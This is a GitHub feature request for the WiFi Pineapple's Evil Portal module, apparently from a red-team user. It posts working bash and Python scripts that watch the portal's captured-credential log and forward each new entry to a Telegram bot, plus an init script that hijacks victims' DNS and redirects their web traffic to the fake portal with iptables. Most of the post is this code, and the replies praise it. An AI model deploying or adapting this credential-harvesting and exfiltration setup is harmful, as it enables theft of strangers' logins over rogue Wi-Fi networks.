hak5 / pineapple-modules

The Official WiFi Pineapple Module Repository for the WiFi Pineapple Mark VII
https://wifipineapple.com

[Evil Portal] Feature Request: notify-ng #54

Open vay3t opened 2 years ago

vay3t commented 2 years ago

Short story: send captured credentials to a Telegram bot.

A couple of years ago I made a bash script that did a hot read of a file and, every time that file was updated, sent a message through the Telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610).

With that idea I adapted it to run on the WiFi Pineapple, and in this way have Telegram notifications for red team campaigns.

/root/notify.sh

#!/bin/bash

function urlencode() {
        # urlencode <string>: percent-encode everything except unreserved characters
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

token="TOKENOFBOT"
id="IDUSER"

# Message body: the contents of the file given as $1, otherwise the placeholder "beep"
if [ -n "$1" ] && [ -f "$1" ]; then
        msj="$(cat "$1")"
else
        msj="beep"
fi

msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
# -f makes curl exit non-zero on an HTTP error reply, so a rejected message is reported too
if ! curl -s -f -X POST "$url" -d chat_id="$id" -d text="$msj" > /dev/null 2>&1; then
        echo "Error with bot"
fi

/root/hotreader.sh

#!/bin/bash

file="/www/.logs"
lines=$(wc -l < "$file")
# -m keeps inotifywait running; on each modify event send only the lines added since the last one
inotifywait -q -m -e modify "$file" | while read -r filename event; do
        linesNow=$(wc -l < "$file")
        added=$((linesNow - lines))
        # Skip events that added no complete line; if the file shrank, just resync the count
        if [ "$added" -gt 0 ]; then
                tail -n "$added" "$file" > /tmp/out.out && bash /root/notify.sh /tmp/out.out
        fi
        lines=$linesNow
done

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    bash /root/hotreader.sh &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # The [h] pattern keeps grep from matching its own command line
    kill $(ps aux | grep '[h]otreader.sh' | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
    kill $(ps aux | grep '[h]otreader.sh' | awk '{print $2}')
}

I would like to work on this more, but I'm not very good at developing web applications.

Notes:

vay3t commented 2 years ago

Python solution

req.txt

opkg install python3-pyinotify

/root/notify.py

import urllib.request
import urllib.parse
import os.path
import pyinotify

file_watcher = os.path.realpath("/www/.logs")
lines = 0  # line count at the previous event; initialised below before the watch starts

def count_lines(file_name):
    with open(file_name) as f:
        return len(f.readlines())

def tail_n(file_name, n):
    # Last n lines. Guard n <= 0: lines[-0:] would return the whole file, re-sending every entry.
    if n <= 0:
        return []
    with open(file_name) as f:
        lines_in_file = f.readlines()
    return lines_in_file[-n:]

def list2string(items):
    return "".join(items)

def sender(msj):
    if msj == "":
        msj = "[EvilPortal]"

    token = "<TOKEN>"
    chat_id = "<CHAT_ID>"

    url = f"https://api.telegram.org/bot{token}/sendMessage"

    values = {
        "chat_id": chat_id,
        "text": msj
    }

    data = urllib.parse.urlencode(values).encode('ascii')
    req = urllib.request.Request(url, data)
    try:
        urllib.request.urlopen(req, timeout=10)
    except OSError as e:
        # URLError, HTTPError and timeouts are OSError subclasses; do not let a
        # network hiccup kill the watcher, the next event simply retries
        print("Error with bot:", e)

class ProcessTransientFile(pyinotify.ProcessEvent):

    def process_IN_MODIFY(self, event):
        global lines
        # We have explicitly registered for this kind of event: send only the
        # lines added since the previous one.
        lines_now = count_lines(file_watcher)
        modified = tail_n(file_watcher, lines_now - lines)
        lines = lines_now
        if modified:
            print(list2string(modified))
            sender(list2string(modified))

    def process_default(self, event):
        # Implicitly IN_CREATE and IN_DELETE are watched too; they are only
        # logged here. A dedicated method (process_IN_CREATE, process_IN_DELETE)
        # would override process_default.
        print('default: ', event.maskname)

lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# watch_transient_file takes the class object (ProcessTransientFile)
# as last parameter, not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    python3 /root/notify.py &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # The [n] pattern keeps grep from matching its own command line
    kill $(ps aux | grep '[n]otify.py' | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
}
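Added example, not part of vay3t's scripts or the Evil Portal module: the line-count delta used by both hot readers misbehaves in two cases, a modify event that adds no newline (in Python, lines[-0:] returns the whole file) and a log that is truncated or replaced. This follower keys on byte offset and inode instead, and scenario() replays those cases on a constructed temp file (its path and contents are made up here).

```python
import os
import tempfile

class LogFollower:
    """Return complete new lines from a growing log, tracked by byte offset and inode.

    Added example, not code from the issue: it returns nothing when no newline-terminated
    data arrived, holds back a partial last line, and restarts from the top when the file
    is truncated or replaced instead of re-sending the whole file.
    """

    def __init__(self, path):
        self.path, self.offset, self.inode, self.pending = path, 0, None, b""
        try:  # start at the current end so existing entries are not re-sent
            st = os.stat(path)
            self.offset, self.inode = st.st_size, st.st_ino
        except FileNotFoundError:
            pass

    def read_new_lines(self):
        """Return the complete lines appended since the previous call."""
        try:
            st = os.stat(self.path)
        except FileNotFoundError:
            return []
        if st.st_ino != self.inode or st.st_size < self.offset:  # rotated or truncated
            self.offset, self.inode, self.pending = 0, st.st_ino, b""
        if st.st_size == self.offset:
            return []  # modify event without new bytes
        with open(self.path, "rb") as f:
            f.seek(self.offset)
            chunk = f.read()
        self.offset += len(chunk)
        head, sep, self.pending = (self.pending + chunk).rpartition(b"\n")
        if not sep:
            return []  # only a partial line so far; wait for its newline
        return head.decode("utf-8", "replace").split("\n")

def scenario():
    """Replay the edge cases on a constructed temp file; returns each call's result."""
    path = os.path.join(tempfile.mkdtemp(), "logs")
    with open(path, "w") as f:
        f.write("old entry\n")
    follower, results = LogFollower(path), []
    for text, mode in [("", "a"), ("user=alice\n", "a"), ("par", "a"),
                       ("tial\nnext\n", "a"), ("fresh\n", "w")]:
        with open(path, mode) as f:
            f.write(text)
        results.append(follower.read_new_lines())
    return results
```

scenario() yields one result per write: nothing for the empty write and the partial line, the completed lines once their newline lands, and only the new content after the truncating write.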

EduardoDesdes commented 2 years ago

Niiiiiice, awesome, holy crap!!!

gvillegass commented 2 years ago

Nice one, bro.